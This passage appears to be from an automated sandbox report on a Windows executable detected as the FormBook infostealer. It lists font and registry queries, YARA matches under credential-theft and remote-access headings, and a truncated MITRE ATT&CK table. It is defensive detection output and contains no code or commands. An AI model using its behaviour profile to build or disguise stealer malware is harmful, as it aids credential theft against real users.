          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services1
